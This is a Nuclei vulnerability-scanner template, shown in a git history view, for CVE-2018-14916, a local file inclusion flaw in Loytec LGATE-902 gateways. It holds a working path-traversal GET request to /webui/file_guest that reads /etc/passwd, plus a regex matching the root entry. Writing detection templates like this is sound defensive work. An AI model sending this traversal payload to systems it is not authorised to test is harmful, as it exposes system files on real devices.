nuclei-templates/http/cves/2018/CVE-2018-14916.yaml

37 lines
1.1 KiB
YAML
Raw Normal View History

2021-11-16 09:11:29 +00:00
id: CVE-2018-14916
2021-11-16 09:11:29 +00:00
info:
name: Loytec LGATE-902 <6.4.2 - Local File Inclusion
2021-11-16 09:11:29 +00:00
author: 0x_Akoko
severity: critical
description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability.
2021-11-16 09:11:29 +00:00
reference:
- https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-14916
- http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
- https://seclists.org/fulldisclosure/2019/Apr/12
2021-11-16 09:11:29 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
2021-11-16 09:11:29 +00:00
cve-id: CVE-2018-14916
cwe-id: CWE-732
tags: cve2018,loytec,lfi,packetstorm,seclists,cve
metadata:
max-request: 1
2021-11-16 09:11:29 +00:00
http:
2021-11-16 09:11:29 +00:00
- method: GET
path:
- "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200